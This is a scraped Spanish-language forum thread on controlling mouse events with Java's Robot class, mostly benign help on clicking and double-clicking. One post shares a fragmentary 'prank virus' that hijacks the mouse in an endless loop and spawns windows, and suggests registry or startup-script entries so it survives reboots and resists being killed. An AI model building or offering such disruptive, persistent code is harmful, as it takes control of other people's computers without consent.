Autor
|
Tema: Controlar eventos del mouse (Leído 26,953 veces)
|
Blitzkrieg'
print('Hi there')
|
y para hacer click creo que es:
|
|
|
|
|
|
|
danielo-
:)
|
jajaja... ya aslio!!! ajua!!! asi era mas facil de explicar!!!! gracias D3bc1!!! y tambien a L-Eyer... si no es mucho pedir como haria para clickear dos veces y pues que en donde cliclkeo se ejecute algo, por ejemplo si tengo un archivo, y yo muevo el muse utilizando el robot, encima del archivo le hago un doble click (robot.mousePress(InputEvent.BUTTON1_MASK) se abra ese archivo? esque si lo selecciona pero no lo abre??? se usaria el presionado de la tecla enter?? o como??? ----crei que seria por la velocidad del clickeo pero resulta que no es asi...pues le puse un tiempo de espera para poder hacer otro click...jejeje... Bueno espero q me ayuden.. y les digo alrtato si funciona lo que manden, que ahora me toy yendo a la esc... GRACIAS!!!!!!
|
|
|
|
|
|
|
Blitzkrieg'
print('Hi there')
|
No mira, Cuando le das mousePress el lo presiona pero no lo levanta, es decir, lo deja presionado. Para hacer click normal, es decir, oprimir y soltar debes hacer mousePress y luego mouseRelease Buenas suerte
|
|
|
|
|
|
|
Debci
Wiki
Actualizate o muere!
|
jajaja... ya aslio!!! ajua!!! asi era mas facil de explicar!!!! gracias D3bc1!!! y tambien a L-Eyer... si no es mucho pedir como haria para clickear dos veces y pues que en donde cliclkeo se ejecute algo, por ejemplo si tengo un archivo, y yo muevo el muse utilizando el robot, encima del archivo le hago un doble click (robot.mousePress(InputEvent.BUTTON1_MASK) se abra ese archivo? esque si lo selecciona pero no lo abre??? se usaria el presionado de la tecla enter?? o como??? ----crei que seria por la velocidad del clickeo pero resulta que no es asi...pues le puse un tiempo de espera para poder hacer otro click...jejeje... Bueno espero q me ayuden.. y les digo alrtato si funciona lo que manden, que ahora me toy yendo a la esc... GRACIAS!!!!!! Seria tan sencillo como hacer lo siguiente:
o mejor aun, usando la logica de la programacion: int numClicks = 2; for(int i = 0; i<numClicks; i++) { }
Y tan solo haria falta modificar la variable de tipo int y añadirle el valor que quiere decir el numero de clicks que hace, 1 por cada vuelta o loop del bucle for. Saludos
|
|
|
|
|
|
|
Blitzkrieg'
print('Hi there')
|
Exacto, es mejor con un bucle for Asi hago yo los clickers xDDD
|
|
|
|
|
|
|
Debci
Wiki
Actualizate o muere!
|
Exacto, es mejor con un bucle for Asi hago yo los clickers xDDD Hoy estoy motivado, cumplo 15 añitos XD Asi que aprovechaos que me vienen ideas a la cabeza xD Saludos
|
|
|
|
|
|
|
Blitzkrieg'
print('Hi there')
|
Exacto, es mejor con un bucle for Asi hago yo los clickers xDDD Hoy estoy motivado, cumplo 15 añitos XD Asi que aprovechaos que me vienen ideas a la cabeza xD Saludos Felicitaciones
|
|
|
|
|
|
|
Debci
Wiki
Actualizate o muere!
|
Codigo para todos, acabo de crear un mini virus de broma: package robot; import java.awt.AWTException; import java.awt.MouseInfo; import java.awt.Robot; import java.awt.Robot.*; import java.util.Random; import java.util.logging.Level; import java.util.logging.Logger; /** * * @author debci */ public class Raton { private static int x; private static int y; private static int y_box; private static int x_box; private static MSGBox msg; public static void main (String args []) { for(int i = 2;i > 1;i++) { try { y_box++; x_box++; System. out. println(MouseInfo. getPointerInfo(). getLocation(). getX()); System. out. println(MouseInfo. getPointerInfo(). getLocation(). getY()); x = x_random.nextInt() * x_random.nextInt() / 2 + i; y = (y_random.nextInt()* x / x_random.nextInt()); robot.mouseMove(x * 100, y * 100); robot.delay(1000); //msg = new MSGBox(); //msg.setVisible(true); //msg.setLocation(y_box * 100, x_box * 100); Logger.getLogger(Raton.class.getName()).log(Level.SEVERE, null, ex); } } } }
Y el codigo de MSGBox: /* * MSGBox.java * * Created on 26-nov-2009, 18:29:57 */ package robot; /** * * @author debci */ public class MSGBox extends javax. swing. JFrame { /** Creates new form MSGBox */ public MSGBox() { initComponents(); } /** This method is called from within the constructor to * initialize the form. * WARNING: Do NOT modify this code. The content of this method is * always regenerated by the Form Editor. */ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code"> private void initComponents() { jLabel1 = new javax. swing. JLabel(); jButton1 = new javax. swing. JButton(); jLabel2 = new javax. swing. JLabel(); public void keyPressed (java. awt. event. KeyEvent evt ) { formKeyPressed(evt); } }); jLabel1.setText("Owned by Debci"); jButton1.setText("Pos vale..."); jLabel2.setText("The power of programming!"); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jLabel1) .addComponent(jLabel2) .addComponent(jButton1)) . addContainerGap(211, Short. MAX_VALUE)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addComponent(jLabel1) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jLabel2) . addPreferredGap(javax. swing. LayoutStyle. ComponentPlacement. RELATED, 14, Short. MAX_VALUE) .addComponent(jButton1) .addContainerGap()) ); pack(); }// </editor-fold> private void formKeyPressed (java. awt. event. KeyEvent evt ) { System. out. println("Se ha presionado la tecla " + evt. getKeyText(evt. getKeyCode())); } /** * @param args the command line arguments */ public static void main (String args []) { javax. swing. JFrame. setDefaultLookAndFeelDecorated(true); public void run() { new MSGBox().setVisible(true); } }); } // Variables declaration - do not modify private javax. swing. JButton jButton1 ; private javax. swing. JLabel jLabel1 ; private javax. swing. JLabel jLabel2 ; // End of variables declaration }
Si compilamos tendremos una bonita broma en la cual no parand e abrirse ventanas y ademas no se puede controlar el raton, es inestable, y si subimos mucho el bucle puede saturar el pc(comprobado) ademas de no poder controlar el raton y no pode rparar el proceso. Digamos que es un buen metodo para proteger vuestros virus de posibles cortadas de procesos. Si le echamos imagiancion y hacemos que se añada al registro ni un apagado acabara con nuestra ejecucion (en el caso de linux, seria cuestion de añadirlo al script de inicio). Saludos
|
|
|
|
|
|
|
Blitzkrieg'
print('Hi there')
|
Buen code!
|
|
|
|
|
|
|
danielo-
:)
|
Yeeeep!!... Si me a funcionado eso de mandar la posicion y que el mouse se mueva para donde quiero.. Ahora estoy intentando mandarlo por socket... pense que seria facil, pero...pue no e podido..., aun asi seguire intentanddo gracias por la ayuda
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Problemas para controlar los eventos de un Soft. Necesito ideas....Veanme..
Programación Visual Basic
|
Pitoniso
|
0
|
1,378
|
19 Noviembre 2006, 23:29 pm
por Pitoniso
|
|
|
Ayuda con eventos del mouse!!!
Programación C/C++
|
delirio
|
0
|
1,873
|
27 Junio 2011, 11:13 am
por delirio
|
|
|
Controlar eventos de un panel en tiempo de ejecución.
.NET (C#, VB.NET, ASP)
|
NetJava
|
1
|
2,477
|
25 Noviembre 2011, 13:56 pm
por NetJava
|
|